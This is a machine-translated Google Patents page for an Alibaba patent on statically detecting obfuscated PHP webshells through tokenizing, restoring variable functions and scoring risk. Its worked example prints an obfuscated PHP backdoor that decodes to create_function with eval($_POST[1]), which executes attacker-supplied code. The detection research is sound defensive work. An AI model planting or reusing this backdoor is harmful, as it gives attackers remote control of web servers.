[go: up one dir, main page]
More Web Proxy on the site http://driver.im/

CN107341399A - Assess the method and device of code file security - Google Patents

Assess the method and device of code file security Download PDF

Info

Publication number
CN107341399A
CN107341399A CN201610282740.8A CN201610282740A CN107341399A CN 107341399 A CN107341399 A CN 107341399A CN 201610282740 A CN201610282740 A CN 201610282740A CN 107341399 A CN107341399 A CN 107341399A
Authority
CN
China
Prior art keywords
token
function
variable
code file
expression
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Granted
Application number
CN201610282740.8A
Other languages
Chinese (zh)
Other versions
CN107341399B (en
Inventor
吴阳波
朱东海
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Alibaba Group Holding Ltd
Original Assignee
Alibaba Group Holding Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Alibaba Group Holding Ltd filed Critical Alibaba Group Holding Ltd
Priority to CN201610282740.8A priority Critical patent/CN107341399B/en
Publication of CN107341399A publication Critical patent/CN107341399A/en
Application granted granted Critical
Publication of CN107341399B publication Critical patent/CN107341399B/en
Active legal-status Critical Current
Anticipated expiration legal-status Critical

Links

Classifications

    • GPHYSICS
    • G06COMPUTING; CALCULATING OR COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55Detecting local intrusion or implementing counter-measures
    • G06F21/56Computer malware detection or handling, e.g. anti-virus arrangements
    • G06F21/562Static detection
    • G06F21/563Static detection by source code analysis

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Software Systems (AREA)
  • Computer Hardware Design (AREA)
  • General Engineering & Computer Science (AREA)
  • Theoretical Computer Science (AREA)
  • Virology (AREA)
  • Health & Medical Sciences (AREA)
  • Physics & Mathematics (AREA)
  • General Physics & Mathematics (AREA)
  • General Health & Medical Sciences (AREA)
  • Machine Translation (AREA)
  • Information Retrieval, Db Structures And Fs Structures Therefor (AREA)

Abstract

The invention discloses a kind of method and device for assessing code file security.Wherein, this method includes:Variable function and assignment expression are parsed from code file to be detected;Restored according to variable function and assignment expression and directly invoke function and original call function;The security of code file is assessed by default safety coefficient corresponding with directly invoking function and default safety coefficient corresponding with original call function.The safety detection scheme detection efficiency for webshell code files that the present invention is solved provided in correlation technique is relatively low, the not high technical problem of accuracy.

Description

Assess the method and device of code file security
Technical field
The present invention relates to computer software fields, in particular to a kind of method for assessing code file security and Device.
Background technology
" web " is meant that server opens web services, and " shell " is meant that acquirement to server to a certain degree Upper operating right.Webshell is typically a kind of existing in the form of the web page files such as asp, php, jsp or cgl Order performing environment, a kind of webpage back door can also be referred to as.Hacker attacks person is after a website is invaded, generally Asp or php backdoor files and the normal web page files under Website server web catalogues can be mixed, Ran Houbian Asp or php back doors can be accessed using browser, to reach the purpose of control Website server.
Due to webshell, it is occurred in the form of dynamic script mostly, and it is substantially also a page of website, But because far beyond one page of its function allows the scope of operation, it is included in system layer and performs one or more Individual operation, and these operating rights often only have webmaster just to possess, and therefore, are generally referred to as website again Backdoor Tools.
Morphological analysis be in computer science by character string be converted to word (Token, its be programming language in minimum Element) sequence process.Lexical analysis phase is the first stage of compilation process, and it is the basis of compiling.This The task in stage is from left to right to read in source program character by character, i.e. the character stream for forming source program is scanned, Then word (also known as word symbol or symbol) is identified according to word-building rule.Morphology parsing core missions be scanning, Identify word and the word to identifying provides qualitative, fixed length processing.
Php supports the concept of variable function.If this means there is round parentheses after a variable name, php will find with The value of variable function of the same name, and will attempt to perform it.Variable function cannot be used for language construction, such as:Echo (), Print (), unset (), isset (), empty (), include (), require () and similar sentence, its Need to use the shell function of itself that these structures are used as into variable function.
In the last few years, with the rapid development of Internet technology, incident is that hacker is directed to the attack of website not Disconnected increase.National Internet emergency response centers are provided《China Internet network security report in 2014》Show, Whole year in 2014 has 40186 websites to be implanted back door within the border in China, wherein, including government website 1529. Hacker often uploads webshell to the hidden catalogue of website after using web leak success attacks, so as to obtain to net The lasting control stood, and most of webshell connection is all similar with normal website visiting, passes through browser And 80 ports of HTTP (HTTP) are transmitted data, disguised high, traditional fire wall no record. And according to the statistics of w3techs websites, by the end of on January 24th, 2016, php in the programming language of global website 81.7% has been accounted for, has been occupied by the webshell for the website write for php language corresponding to it based on this Proportion also significantly increases.
Because webshell needs to explain execution by corresponding script, morphology parsing can be carried out before execution, By code analysis into word one by one (mark), while assign this word and specifically act on, this is programming language most base This component units, that is, token.
At present, provided in correlation technique it is a kind of for php webshall based on virtual machine come the dynamic detection realized Technology, its specific implementation process are that code file is carried out into morphology, syntax parsing first, are produced after completion to be resolved Middle layer identification code, then explain on a virtual machine and perform the intermediate code that back obtains, and utilize in the process of implementation Built-in function storehouse and abnormal behaviour rule base are analyzed middle behavior, judge whether it is malice with this Webshell codes.
However, because this dynamic web shell detection techniques need to perform using virtual machine dynamic analog, in detection During time for consuming it is longer, it can not only accomplish really to understand semantic, nor can accomplish that real-time is examined Survey;Moreover, the webshell of currently the majority can add password and operational factor, if not specifying parameter Or password, the technology of virtual machine dynamic detection can not judge whether code is malice at all, this is also current virtual machine examination Survey technology is difficult to the wide gap gone beyond.
In addition, existing static webshell detection techniques usually require to judge script using the mode of condition code matching File whether be malice webshell.Such a method needs to carry out the feature in the script and feature database in website sternly The string matching of lattice, if finding feature string in script, determine that it is the webshell of malice;Similar, Expressive Features code can also be carried out using regular expression, but essence is also to be to rely on condition code, so current is quiet State webshell detection techniques equally exist following defect:To whether be malice webshell determination rate of accuracy compared with It is low, to manslaughter rate higher, and feature database is huge and needs staff constantly to collect sample extraction condition code at any time, especially It is the PHP variable functions for deformation, relies only on feature database to complete to judge substantially complete malice Webshell detections.
For it is above-mentioned the problem of, not yet propose effective solution at present.
The content of the invention
The embodiments of the invention provide a kind of method and device for assessing code file security, at least to solve related skill The safety detection scheme detection efficiency for webshell code files provided in art is relatively low, and accuracy is not high Technical problem.
One side according to embodiments of the present invention, there is provided a kind of method for assessing code file security, including:
Variable function and assignment expression are parsed from code file to be detected;According to variable function and assignment table Restored up to formula and directly invoke function and original call function;Corresponding with directly invoking function it is safely by default Number and default safety coefficient corresponding with original call function are assessed the security of code file.
Alternatively, variable function and assignment expression are parsed from code file to be included:Word is carried out to code file Method is analyzed, and the character string in code file is converted into Token sequences;Variable letter is parsed from Token sequences Number and assignment expression.
Alternatively, parsing variable function from Token sequences includes:Finding step:Token is traveled through according to preset order Each Token in sequence, lookup classification are operator, and value is the first Token of left round parentheses;Judgment step: In the case where finding the first Token, the Token of the previous traversal adjacent with the first Token classification is judged Whether it is variable;If it is, it is operator to begin look for classification from the first Token, value is the of right round parentheses Two Token, and the parameter sets between the first Token and the 2nd Token are matched with default regular expression In the case of, by current lookup to function be recorded as variable function, finding step is returned to, until parsing variable letter Number.
Alternatively, parsing assignment expression from Token sequences includes:Finding step:Traveled through according to preset order Each Token in Token sequences, lookup classification are operator, and value is the 3rd Token of equal sign;Obtaining step: In the case where finding the 3rd Token, the Token of the previous traversal adjacent with the 3rd Token is obtained, and will The Token got value be recorded as current lookup to assignment expression in treat the variable of assignment;From the 3rd Token It is operator to begin look for classification, and value is the 4th Token of branch, obtain the 3rd Token and the 4th Token it Between one or more Token, and by one or more Token be recorded as current lookup to assignment expression in treat The expression formula of calculating, finding step is returned to, until parsing assignment expression.
Alternatively, restored according to variable function and assignment expression and directly invoke function and original call function and include: Searched from default transcoding rule and directly invoke function with what variable function matched;Calculate in assignment expression and every Value corresponding to the variable of individual assignment expression, and established between the variable of each assignment expression and corresponding value Corresponding relation;Original call function is identified from directly invoking using default transcoding rule and corresponding relation in function.
Alternatively, by safety coefficient corresponding with directly invoking function and corresponding with original call function it is safely Several securities to code file, which carry out assessment, to be included:Peace corresponding with directly invoking function is read from default storage region Overall coefficient and safety coefficient corresponding with original call function;Pair safety coefficient corresponding with directly invoking function and Safety coefficient corresponding with original call function carries out summation operation, obtains safety evaluation result.
Another aspect according to embodiments of the present invention, additionally provide another method for assessing code file security, bag Include:
Variable function is parsed from code file to be detected;Restored according to variable function and directly invoke function;It is logical Default safety coefficient corresponding with directly invoking function is crossed to assess the security of code file.
Another aspect according to embodiments of the present invention, there is provided a kind of device for assessing code file security, including:
Parsing module, for parsing variable function and assignment expression from code file to be detected;Reduce mould Block, function and original call function are directly invoked for being restored according to variable function and assignment expression;Evaluation module, For passing through default safety coefficient corresponding with directly invoking function and default safety corresponding with original call function Coefficient is assessed the security of code file.
Alternatively, parsing module includes:Converting unit, for carrying out morphological analysis to code file, by code file In character string be converted to Token sequences;Resolution unit, for parsed from Token sequences variable function with And assignment expression.
Alternatively, resolution unit includes:First searches subelement, for being traveled through according to preset order in Token sequences Each Token, lookup classification is operator, and value is the first Token of left round parentheses;Judgment sub-unit, it is used for In the case where finding the first Token, the Token of the previous traversal adjacent with the first Token classification is judged Whether it is variable;First parsing subelement, for when judgment sub-unit output is is, being looked into since the first Token It is operator to look for classification, and value is the 2nd Token of right round parentheses, and by between the first Token and the 2nd Token Parameter sets and default regular expression match in the case of, by current lookup to function be recorded as variable letter Number, return to first and search subelement, until parsing variable function.
Alternatively, resolution unit includes:Second searches subelement, for being traveled through according to preset order in Token sequences Each Token, lookup classification is operator, and value is the 3rd Token of equal sign;Subelement is obtained, for looking into In the case of finding the 3rd Token, the Token of the previous traversal adjacent with the 3rd Token is obtained, and will obtain To Token value be recorded as current lookup to assignment expression in treat the variable of assignment;Second parsing subelement, It is operator for beginning look for classification from the 3rd Token, value is the 4th Token of branch, obtains the 3rd Token With one or more Token between the 4th Token, and one or more Token are recorded as what current lookup arrived Expression formula to be calculated in assignment expression, return to second and search subelement, until parsing assignment expression.
Alternatively, recovery module includes:First reduction unit, for lookup and variable function from default transcoding rule What is matched directly invokes function;Processing unit, for calculating the change in assignment expression with each assignment expression Value corresponding to amount, and establish corresponding relation between the variable of each assignment expression and corresponding value;Second also Former unit, for identifying original call function in function from directly invoking using default transcoding rule and corresponding relation.
Alternatively, evaluation module includes:Reading unit, for reading from default storage region and directly invoking function pair The safety coefficient and safety coefficient corresponding with original call function answered;Computing unit, for pair with directly invoke letter Safety coefficient corresponding to number and safety coefficient corresponding with original call function carry out summation operation, obtain security and comment Estimate result.
Another further aspect according to embodiments of the present invention, additionally provide another device for assessing code file security, bag Include:
Parsing module, for parsing variable function from code file to be detected;Recovery module, for according to change Flow function, which restores, directly invokes function;Evaluation module, for passing through default safety corresponding with directly invoking function Coefficient is assessed the security of code file.
In embodiments of the present invention, using parsing variable function and assignment expression from code file to be detected Mode, restored according to variable function and assignment expression and directly invoke function and original call function and by default Safety coefficient corresponding with directly invoking function and default safety coefficient corresponding with original call function to code text The security of part is assessed, it is achieved thereby that improving the detection efficiency of variable function type webshell code files, is carried The technique effect of testing result accuracy is risen, and then is solved literary for webshell codes provided in correlation technique The safety detection scheme detection efficiency of part is relatively low, the not high technical problem of accuracy.
Brief description of the drawings
Accompanying drawing described herein is used for providing a further understanding of the present invention, forms the part of the application, this hair Bright schematic description and description is used to explain the present invention, does not form inappropriate limitation of the present invention.In accompanying drawing In:
Fig. 1 is a kind of hardware configuration of the terminal of the method for assessment code file security of the embodiment of the present invention Block diagram;
Fig. 2 is the flow chart of the method for assessment code file security according to embodiments of the present invention;
Fig. 3 is the flow chart of another method for assessing code file security according to embodiments of the present invention;
Fig. 4 is a kind of structured flowchart of the device of assessment code file security according to embodiments of the present invention;
Fig. 5 is a kind of structured flowchart of device for assessing code file security according to the preferred embodiment of the invention;
Fig. 6 is the structured flowchart of another device for assessing code file security according to embodiments of the present invention;
Fig. 7 is a kind of structured flowchart of terminal according to embodiments of the present invention.
Embodiment
In order that those skilled in the art more fully understand the present invention program, below in conjunction with the embodiment of the present invention Accompanying drawing, the technical scheme in the embodiment of the present invention is clearly and completely described, it is clear that described embodiment The only embodiment of a present invention part, rather than whole embodiments.Based on the embodiment in the present invention, ability The every other embodiment that domain those of ordinary skill is obtained under the premise of creative work is not made, should all belong to The scope of protection of the invention.
It should be noted that term " first " in description and claims of this specification and above-mentioned accompanying drawing, " Two " etc. be for distinguishing similar object, without for describing specific order or precedence.It should be appreciated that this The data that sample uses can exchange in the appropriate case, so as to embodiments of the invention described herein can with except Here the order beyond those for illustrating or describing is implemented.In addition, term " comprising " and " having " and they Any deformation, it is intended that cover it is non-exclusive include, for example, containing the process of series of steps or unit, side Method, system, product or equipment are not necessarily limited to those steps clearly listed or unit, but may include unclear It is that ground is listed or for the intrinsic other steps of these processes, method, product or equipment or unit.
The explanation of nouns that the present invention relates to is as follows:
(1) variable function typically refers to the function concept that PHP is supported, if having round parentheses after a variable name, that PHP will find the function of the same name with the value of variable, and attempt to perform the function searched out;
(2) assignment expression refers to variable is connected with expression formula by equal sign, by calculating on the right side of assignment operator The value of expression formula, then the value of assignment operator right-hand side expression is assigned to the variable in left side, so that assignment expression is left Value of the value of the variable of side as expression formula;
(3) function is directly invoked to refer to according to default transcoding rule be led to according to the variable function parsed from code file Cross the function without transcoding that the mode directly invoked restores;
Such as:" $ _ uU=chr (99) .chr (104) .chr (114) " can be restored directly according to ASCII character transcoding rule Connecing call function is:chr;
(4) original call function refer to according to the variable function that is parsed from code file and assignment expression according to The function without transcoding that default transcoding rule is restored by way of recalling (iteration) and calling;
Such as:" $ _ uU=chr (99) .chr (104) .chr (114) " can be restored directly according to ASCII character transcoding rule Connecing call function is:chr;
" $ _ fF=$ _ uU (99) $ _ uU (114) $ _ uU (101) $ _ uU (97) $ _ uU (116) $ _ uU (101) $ _ uU ( 95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$ _ uU (110) " can restore according to ASCII character transcoding rule to be directly invoked function and is:create_function;
" $ _ cC=$ _ uU (101) $ _ uU (118) $ _ uU (97) $ _ uU (108) $ _ uU (40) $ _ uU (36) $ _ uU (9 5).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41) $ _ uU (59) " can restore according to ASCII character transcoding rule to be directly invoked function and is:eval($_POST[1]);
Finally give with $ _=$ _ fF (" ", $ _ cC) corresponding to original call function be:create_function ("",eval($_POST[1])。
(5) what transcoding rule referred to pre-establish is converted to implementing for another form by code from a kind of form Standard.
(6) safety coefficient refers to analyze the obtained level of security of common mathematical function or the danger of dangerous function according to long-time statistical Dangerous rank;
(7) assess and refer to judge whether the code file is webshell that invader (or attacker) malice uploads File.
Embodiment 1
According to embodiments of the present invention, a kind of embodiment of the method for assessing code file security is additionally provided, it is necessary to illustrate , can be in the computer system of such as one group computer executable instructions the flow of accompanying drawing illustrates the step of Perform, although also, show logical order in flow charts, in some cases, can be with different from this The order at place performs shown or described step.
The embodiment of the method that the embodiment of the present application one is provided can be in mobile terminal, terminal or similar fortune Calculate and performed in device.Exemplified by running on computer terminals, Fig. 1 is that a kind of of the embodiment of the present invention assesses code text The hardware block diagram of the terminal of the method for part security.As shown in figure 1, terminal 10 can include (processor 102 can include but is not limited to microprocessor to one or more (one is only shown in figure) processors 102 MCU or PLD FPGA etc. processing unit), the memory 104 for data storage and for leading to The transmitting device 106 of telecommunication function.It will appreciated by the skilled person that the structure shown in Fig. 1 is only to illustrate, It does not cause to limit to the structure of above-mentioned electronic installation.For example, terminal 10 may also include than shown in Fig. 1 More either less components have the configuration different from shown in Fig. 1.
Memory 104 can be used for the software program and module of storage application software, such as the assessment in the embodiment of the present invention Programmed instruction/module corresponding to the method for code file security, processor 102 are stored in memory 104 by operation Interior software program and module, so as to perform various function application and data processing, that is, realize above-mentioned assessment generation The method of code file security.Memory 104 may include high speed random access memory, may also include nonvolatile memory, Such as one or more magnetic storage device, flash memory or other non-volatile solid state memories.In some instances, Memory 104 can further comprise relative to the remotely located memory of processor 102, and these remote memories can be with Pass through network connection to terminal 10.The example of above-mentioned network include but is not limited to internet, intranet, LAN, mobile radio communication and combinations thereof.
Transmitting device 106 is used to data are received or sent via a network.Above-mentioned network instantiation may include The wireless network that the communication providerses of terminal 10 provide.In an example, transmitting device 106 includes one Network adapter (Network Interface Controller, referred to as NIC), it can pass through base station and other nets Network equipment is connected so as to be communicated with internet.In an example, transmitting device 106 can be radio frequency (Radio Frequency, referred to as RF) module, it is used to wirelessly be communicated with internet.
Under above-mentioned running environment, this application provides the method for assessment code file security as shown in Figure 2.Figure 2 be the flow chart of the method for assessment code file security according to embodiments of the present invention.As shown in Fig. 2 this method Following processing step can be included:
Step S22:Variable function and assignment expression are parsed from code file to be detected;
Step S24:Restored according to variable function and assignment expression and directly invoke function and original call function;
Step S26:Pass through default safety coefficient corresponding with directly invoking function and default and original call function Corresponding safety coefficient is assessed the security of code file.
The technical scheme that the embodiment of the present invention is provided can apply to the webshell Static Detections of PHP scripts. By the code file write using PHP code is parsed (including:Morphological analysis, semantic analysis), for by The variable function that character string is spliced is reduced, while directly invokes function and code according to what is restored Assignment expression in file is carried forward code backtracking, until original call function is restored, to judge code text Whether webshell common mathematical functions or dangerous function are included in part.Then, then by default with directly invoking function pair Answer safety coefficient (such as:The harmful grade of common mathematical function or dangerous function) and default and original call function pair The safety coefficient answered is assessed the security of code file, judge the code file whether be invader (or attack Person) malice upload webshell files.
It should be noted that the process that the above-mentioned security to code file is assessed can use Lua as realization Language.Because simulator small volume, the speed of service of Lua language are fast, committed memory is low, compatibility is good, exploitation is fast The advantages that fast is spent, while the mutual calling of itself and C/C++ language is convenient to, and therefore, is very easy to collection cost hair The technical scheme that bright embodiment is provided.
Alternatively, in step S22, variable function and assignment expression are parsed from code file to be included Step performed below:
Step S221:Morphological analysis is carried out to code file, the character string in code file is converted into Token sequences Row;
Step S222:Variable function and assignment expression are parsed from Token sequences.
The lexer morphology that Lua can be used for reference by lexical analyzer parses storehouse and PHP zend module morphological analyses Identifier, annotation, numeral, PHP keywords, variable, operator are extracted respectively from the source program in code file And spcial character carries out canonical matching, and then all Token are carried according to sequencing from original code file Composition Tokens arrays are taken out, lexical analyzer exports word symbol and may generally be expressed as following dualistic formula: (word types, word property value);
Wherein, because keyword is that have the identifier for fixing meaning by what program language defined, so keyword is usual It is not used as general identifier;Identifier can be used for representing various titles, such as:Name variable, array title, Function name, process title;The type of constant can include but is not limited to:Integer, full mold, Boolean type, character type; The type of operator can include but is not limited to:+、-、*、/.
Assuming that the code segment intercepted in code file to be detected is as follows:
<$ _ uU=chr (99) .chr (104) .chr (114);$ _ cC=$ _ uU (101) $ _ uU (118) $ _ uU (97) $ _ u U(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU (91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$ _ fF=$ _ uU (99) $ _ uU (114) $ _ uU (101) .$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU( 99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$ _=$ _ fF (" ", $ _ cC);@$_();>
With code line " $ _ uU=chr (99) .chr (104) .chr (114);" exemplified by carry out the obtained result of morphological analysis such as Shown in table 1:
Table 1
Classification Property value
Variable $_uU
Operator =
Identifier chr
Operator (
Numeral 99
Operator )
Operator .
Identifier chr
Operator (
Numeral 104
Operator )
Operator .
Identifier chr
Operator (
Numeral 114
Operator )
Operator
Character string can be converted into Token sequences by above-mentioned code segment according to reformulationses as shown in table 1, from Variable function and assignment expression are parsed in Token sequences.
Alternatively, in step S222, variable function is parsed from Token sequences can include step performed below:
Step S2221:Each Token in Token sequences is traveled through according to preset order, lookup classification is operator, Value is the first Token of left round parentheses;
Step S2222:In the case where finding the first Token, previous time adjacent with the first Token is judged Whether the Token gone through classification is variable;
Step S2223:If it is, it is operator to begin look for classification from the first Token, value is right round parentheses The 2nd Token, and by the parameter sets between the first Token and the 2nd Token and default regular expression phase In the case of matching, by current lookup to function be recorded as variable function, return to step S2221, until parsing Variable function.
After above-mentioned Tokens arrays are obtained by morphological analysis, can according to preset order (such as:According to morphology point The order that parser is analyzed code file) successively travel through Tokens arrays in each Token.Due to function Calling needs to use round parentheses (i.e. " () "), therefore, it is necessary first to which it is operator to search classification, and value is left circle The Tokens [i] of bracket (i.e. " (") (equivalent to above-mentioned first Token);Secondly, classification is being found as operation Symbol, value is the Tokens [i] of left round parentheses (i.e. " (") and then the Token [i-1] for further obtaining previous traversal Classification whether be variable;Then, if Token [i-1] classification is variable, classification is continued to search for as operation Symbol, value are the Tokens [i+n] (equivalent to above-mentioned 2nd Token, n is positive integer) of right round parentheses, and by the , will be current in the case that parameter sets between one Token and the 2nd Token match with default regular expression The function found is recorded as variable function, wherein, as long as above-mentioned parameter set can meet PHP regular expressions Matched rule.Such as:Parameter sets can include but is not limited at least one of:Alphabetical, digital, lower stroke Line, additional character (such as:$), user accesses the parameter of PHP webpages transmission.
If it should be noted that when $ and at least one letter, numeral, underscore three simultaneously be present, need Started with $, such as:$ _ POST [' aaa '], if not using $ as beginning, then obtained parameter sets will not be inconsistent The matched rule for stating PHP regular expressions is closed, such as:a$b.
Specific to above-mentioned code segment example, when detecting first " when (", due to " the previous Token of (" For chr, it is variable that its classification is not for identifier, and therefore, chr (99) is not variable function.When detecting second It is individual " when (", due to this " the previous Token of (" is chr, and it is variable that its classification is not for identifier, because This, chr (104) is not variable function.When detecting the 3rd " when (", due to " the previous Token of (" For chr, it is variable that its classification is not for identifier, and therefore, chr (114) is not variable function.Until when detection To the 4th " when (", due to this " the previous Token of (" is $ _ uU, and its classification is variable, therefore, it is necessary to Continue to judge whether 101 at this between " (" and first ") " thereafter meet above-mentioned PHP regular expressions Matched rule, it is the matched rule for meeting above-mentioned PHP regular expressions, therefore, _ uU (101) by matching numeral 101 The variable function as required to look up, wherein, $ _ uU is variable function title, and 101 be the parameter in variable function. Similarly, by that analogy, the variable function in above-mentioned code segment can also include:$ _ uU (118), $ _ uU (97), $ _ uU (108), $ _ uU (40), $ _ uU (36), _ uU (95) $ _ uU (80), $ _ uU (79) $ _ uU (83), $ _ uU (84), $ _ uU (91), $ _ uU (49), $ _ uU (93), $ _ uU (41), $ _ uU (59), $ _ uU (99), $ _ uU (114), $ _ uU (101) $ _ uU (97), $ _ uU (116), $ _ uU (101), $ _ uU (95), $ _ uU (102), $ _ uU (117), $ _ uU (110), $ _ uU (99), $ _ uU (116), $ _ uU (105), $ _ uU (111), $ _ uU (110), $ _ fF (" ", $ _ cC).
Alternatively, in step S222, assignment expression is parsed from Token sequences can include step performed below Suddenly:
Step S2224:Each Token in Token sequences is traveled through according to preset order, lookup classification is operator, Value is the 3rd Token of equal sign;
Step S2225:In the case where finding the 3rd Token, previous time adjacent with the 3rd Token is obtained The Token gone through, and by the Token got value be recorded as current lookup to assignment expression in treat assignment Variable;
Step S2226:It is operator to begin look for classification from the 3rd Token, and value is the 4th Token of branch, is obtained One or more Token between the 3rd Token and the 4th Token are taken, and one or more Token are recorded as Current lookup to assignment expression in expression formula to be calculated, return to step S2224, until parsing assignment expression Formula.
After above-mentioned Tokens arrays are obtained by morphological analysis, it is with obtaining variable function difference:Assignment table Mainly realized up to formula by equal sign (=).Therefore, can according to preset order (such as:According to lexical analyzer pair The order that code file is analyzed) successively travel through Tokens arrays in each Token.Due to assignment expression Equal sign (i.e. "=") is needed to use, therefore, it is necessary first to which it is operator to search classification, and value is equal sign (i.e. "=") Tokens [i] (equivalent to above-mentioned 3rd Token);Secondly, the Token [i-1] of previous traversal is further obtained, And by the Token got value be recorded as current lookup to assignment expression in treat the variable of assignment;Then, It is operator to continue to search for classification, and for the Tokens [i+n] of branch, (equivalent to above-mentioned 4th Token, n is just to value Integer), and one or more Token between Tokens [i] and Tokens [i+n] are recorded as what current lookup arrived Expression formula to be calculated in assignment expression.
Specific to above-mentioned code segment example, when detecting first "=", previous traversal is further obtained Token [i-1], and the Token got value (i.e. $ _ uU) is recorded as the assignment expression that current lookup arrives In treat the variable of assignment;Then, it is operator to continue to search for classification, value for ";" Tokens [i+n], and will One or more Token (i.e. chr (99) .chr (104) .chr (114)) between Tokens [i] and Tokens [i+n] Be recorded as current lookup to assignment expression in expression formula to be calculated.Similarly, by that analogy, it can be found that upper State and assignment expression as shown in table 2 in code segment be present:
Table 2
Alternatively, in step s 24, restored according to variable function and assignment expression and directly invoke function and original Call function can include step performed below:
Step S241:Searched from default transcoding rule and directly invoke function with what variable function matched;
Step S242:Value corresponding with the variable of each assignment expression in assignment expression is calculated, and each Corresponding relation is established between the variable of assignment expression and corresponding value;
Step S243:Original call function is identified from directly invoking using default transcoding rule and corresponding relation in function.
By above-mentioned table 2, "=" in assignment expression " $ _ uU=chr (99) .chr (104) .chr (114) " The expression formula on the right carries out transcoding (equivalent to above-mentioned default transcoding rule) by ASCII character and obtained.ASCII character Combined using 7 specified or 8 bits to represent 128 or 256 kind of possible character.Standard ASCII character Also basic ASCII character is, represents that all upper case and lower cases are alphabetical using 7 bits, numeral 0 to 9, Punctuation mark, and the Special controlling character used in Americanese (need exist for paying special attention to:ASCII character with Differentiation in the digit of standard ASCII character, standard ASCII character are 7 binary representations).It is (right by decimal coded Should) abbreviated character (or function/explanation) it can be seen that, chr (99) corresponds to lowercase " c ", and chr (104) is right Should be in lowercase " h ", chr (114) corresponds to lowercase " r ", therefore, in the assignment expression, with change The value for measuring expression formula corresponding to $ _ uU is chr.Similarly, in assignment expression $ _ fF=$ _ uU (99) $ _ uU (114) $ _ uU (101) $ _ uU (97) $ _ uU (116) $ _ uU (101) $ _ uU (95) $ _ uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(11 0) in, the value of expression formula corresponding with variable $ _ fF is create_function.In assignment expression $ _ cC=$ _ uU (101) $ _ uU (118) $ _ uU (97) $ _ uU (108) $ _ uU (40) $ _ uU (36) $ _ uU (95) $ _ u U(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU( 59) in, the value of expression formula corresponding with variable $ _ cC is eval ($ _ POST [1]).Finally, in assignment expression It is create_function with the value of variable $ _ corresponding expression formula in $ _=$ _ fF (" ", $ _ cC) ("",eval($_POST[1])。
By above-mentioned analysis, corresponding relation can be established between the variable of each assignment expression and corresponding value. Secondly, by assignment expression " $ _ uU=chr (99) .chr (104) .chr (114) " according to ASCII character transcoding rule It can restore and directly invoke function chr;Then, according to ASCII character transcoding rule and the variable that has built up with Corresponding relation $ _ → $ _ fF, $ _ cC → $ _ uU between expression formula value recalls successively, until obtaining original call function Create_function (" ", eval ($ _ POST [1]), wherein, ($ _ POST [1] is represented one as establishment eval Individual function, for performing HTTP POST code, thus, it is possible to will become apparent from (" ", eval (_ POST [1]) have despiteful webshell properties to create_function;
Alternatively, in step S26, by safety coefficient corresponding with directly invoking function and with original call letter Safety coefficient corresponding to number, which carries out assessment to the security of code file, can include step performed below:
Step S262:Corresponding with directly invoking function safety coefficient and and original call are read from default storage region Safety coefficient corresponding to function;
Step S264:Pair safety coefficient corresponding with directly invoking function and corresponding with original call function it is safely Number carries out summation operation, obtains safety evaluation result.
According to corresponding with directly invoking function chr safety coefficient set in advance (such as:Default risk score or Safety scoring) and according to set in advance and original call function create_function (" ", corresponding to eval ($ _ POST [1]) safety coefficient carry out comprehensive assessment determine code file danger classes (such as: Ordinary hazard rank, moderate risk rank, high harmful grade), such as:Directly invoke dangerous corresponding to function chr Score as 1 point, and original call function create_function (comment by " ", danger corresponding to eval ($ _ POST [1]) It is divided into 3 points, the safety evaluation result finally given is:4 points.Above-mentioned code segment category is finally determined by assessing In high-risk malice webshell files.
In addition, under the running environment shown in Fig. 1, present invention also provides another assessment code as shown in Figure 3 The method of file security.Fig. 3 is another method for assessing code file security according to embodiments of the present invention Flow chart.As shown in figure 3, this method can include following processing step:
Step S32:Variable function is parsed from code file to be detected;
Step S34:Restored according to variable function and directly invoke function;
Step S36:The security of code file is carried out by default safety coefficient corresponding with directly invoking function Assess.
Assignment expression can be both included in code file to be detected, naturally it is also possible to not comprising assignment expression. And it is relatively easy for the PHP code file not comprising assignment expression, its assessment mode, Main Basiss preset transcoding Rule (such as:ASCII character transcoding rule) restored from PHP code file and directly invoke function.Then, then The security of code file is assessed using default safety coefficient corresponding with directly invoking function.
During being preferable to carry out, be able to can be used for reference by lexical analyzer Lua lexer morphology parsing storehouse and PHP zend modules morphological analysis extracts identifier, annotation, numeral, PHP respectively from the source program in code file Keyword, variable, operator and spcial character carry out canonical matching, and then will be all from original code file Token extracts composition Tokens arrays according to sequencing.Then, then from Tokens arrays parse change Flow function.
After above-mentioned Tokens arrays are obtained by morphological analysis, can according to preset order (such as:According to morphology point The order that parser is analyzed code file) successively travel through Tokens arrays in each Token.Due to function Calling needs to use round parentheses (i.e. " () "), therefore, it is necessary first to which it is operator to search classification, and value is left circle The Tokens [i] of bracket (i.e. " (") (equivalent to above-mentioned first Token);Secondly, classification is being found as operation Symbol, value is the Tokens [i] of left round parentheses (i.e. " (") and then the Token [i-1] for further obtaining previous traversal Classification whether be variable;Then, if Token [i-1] classification is variable, classification is continued to search for as operation Symbol, value are the Tokens [i+n] (equivalent to above-mentioned 2nd Token, n is positive integer) of right round parentheses, and by the , will be current in the case that parameter sets between one Token and the 2nd Token match with default regular expression The function found is recorded as variable function, wherein, as long as above-mentioned parameter set can meet PHP regular expressions Matched rule.Such as:Parameter sets can include but is not limited at least one of:Alphabetical, digital, lower stroke Line, additional character (such as:$), user accesses the parameter of PHP webpages transmission.
